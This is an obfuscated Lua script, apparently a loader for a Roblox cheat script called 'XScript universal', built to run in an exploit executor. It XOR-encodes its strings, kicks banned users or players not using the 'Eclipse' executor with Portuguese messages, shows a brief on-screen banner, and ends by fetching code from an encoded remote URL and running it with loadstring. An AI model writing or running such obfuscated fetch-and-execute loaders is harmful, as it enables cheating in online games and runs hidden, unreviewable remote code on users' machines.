--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.8) ~  Much Love, Ferib 

]]--

local v0=string.char;local v1=string.byte;local v2=string.sub;local v3=bit32 or bit ;local v4=v3.bxor;local v5=table.concat;local v6=table.insert;local function v7(v17,v18) local v19={};for v30=1, #v17 do v6(v19,v0(v4(v1(v2(v17,v30,v30 + 1 )),v1(v2(v18,1 + (v30% #v18) ,1 + (v30% #v18) + 1 )))%256 ));end return v5(v19);end local v8={1111,72029 -(43 + 158) };local function v9(v20) local v21=0 -0 ;while true do if (v21==(0 + 0)) then for v51,v52 in pairs(v8) do if (v20==v52) then return true;end end return false;end end end local v10={v7("\249\202\220\45\212\186\201\21","\126\177\163\187\69\134\219\167"),v7("\12\218\36\192\238","\156\67\173\74\165"),v7("\21\179\68\31\178","\38\84\215\41\118\220\70")};local function v11(v22) local v23=v22:GetRoleInGroup(5139833 -3905266 );for v31,v32 in pairs(v10) do if (v23==v32) then return true;end end return false;end local function v12() local v24=getexecutorname();return v24 and (v24:lower()==v7("\85\21\46\27\238\67\19","\158\48\118\66\114")) ;end local v13=game:GetService(v7("\155\40\17\47\118\183\232","\155\203\68\112\86\19\197"));local v14=v13.LocalPlayer;if (v9(v14.UserId) or v11(v14)) then local v33=0;while true do if (v33==0) then v14:Kick("Você não tem permissão para executar este script (você está banido do XScript universal). Entre no https://discord.gg/qsYR297DR2 e faça um pedido de desban.");return;end end end if  not v12() then local v34=0;local v35;while true do if ((0 + 0)==v34) then v35=0;while true do if (v35==(0 -0)) then v14:Kick("Ops, o XScript agora é original do executor Eclipse. Baixe o executor Eclipse para executar o XScript.");return;end end break;end end end local function v15() local v25=0;local v26;local v27;local v28;while true do if (v25==1) then local v36=0 -0 ;while true do if (v36==(860 -(814 + 45))) then v27.Position=UDim2.new(0.2 -0 ,0 + 0 ,0.3 + 0 ,0);v25=887 -(261 + 624) ;break;end if (v36==0) then v27=Instance.new(v7("\142\111\125\37\22","\35\200\29\28\72\115\20\154"));v27.Size=UDim2.new(0.6 -0 ,0,1080.4 -(1020 + 60) ,0);v36=1;end end end if (v25==(1428 -(630 + 793))) then local v37=0 -0 ;while true do if (v37==(0 -0)) then v28.TextScaled=true;v28.TextWrapped=true;v37=1 + 0 ;end if (v37==1) then v28.TextStrokeTransparency=0.7 -0 ;v25=1753 -(760 + 987) ;break;end end end if (v25==(1913 -(1789 + 124))) then v26=Instance.new(v7("\117\222\36\249\69\118\194\237\79","\152\38\189\86\156\32\24\133"));v26.Name=v7("\208\88\166\66\245\89\160\117\255\69\162\67\242","\38\156\55\199");v26.Parent=game.CoreGui;v25=767 -(745 + 21) ;end if (v25==(2 + 2)) then v28.BackgroundTransparency=2 -1 ;v28.Text=v7("\131\101\234\146\19\96\4\129\158\117\229\137\10\99\21\129\152\119\251\146\31\119\17\239\159\121\135\238\116","\161\219\54\169\192\90\48\80");v28.TextColor3=Color3.fromRGB(1000 -745 ,3 + 252 ,255);v25=5;end if (v25==(2 + 0)) then v27.BackgroundColor3=Color3.fromRGB(255,1055 -(87 + 968) ,0);v27.BackgroundTransparency=0.2;v27.Parent=v26;v25=3;end if (v25==(13 -10)) then local v47=0 + 0 ;local v48;while true do if (v47==(0 -0)) then v48=1413 -(447 + 966) ;while true do if (v48==1) then v28.Position=UDim2.new(0 -0 ,1827 -(1703 + 114) ,701.35 -(376 + 325) ,0);v25=4;break;end if (v48==(0 -0)) then local v59=0;while true do if (v59==(2 -1)) then v48=1;break;end if (v59==0) then v28=Instance.new(v7("\45\186\201\203\161\45\54\28\179","\84\121\223\177\191\237\76"));v28.Size=UDim2.new(1 + 0 , -(44 -24),14.3 -(9 + 5) ,376 -(85 + 291) );v59=1266 -(243 + 1022) ;end end end end break;end end end if (v25==(22 -16)) then v28.TextStrokeColor3=Color3.fromRGB(42 + 8 ,1230 -(1123 + 57) ,41 + 9 );v28.Parent=v27;break;end end end local function v16() local v29=game.CoreGui:FindFirstChild(v7("\101\77\1\33\64\76\7\22\74\80\5\32\71","\69\41\34\96"));if v29 then v29:Destroy();end end v15();wait(8);v16();loadstring(game:HttpGet(v7("\180\215\195\26\17\113\243\140\197\11\21\101\187\202\195\2\23\41\169\208\210\24\1\36\178\215\210\4\22\101\191\204\218\69\42\46\165\251\218\11\22\35\185\214\196\69\58\24\191\209\222\26\22\56\243\209\210\12\17\100\180\198\214\14\17\100\177\194\222\4\77\19\143\192\197\3\18\63\137\205\222\28\7\57\175\194\219","\75\220\163\183\106\98")))();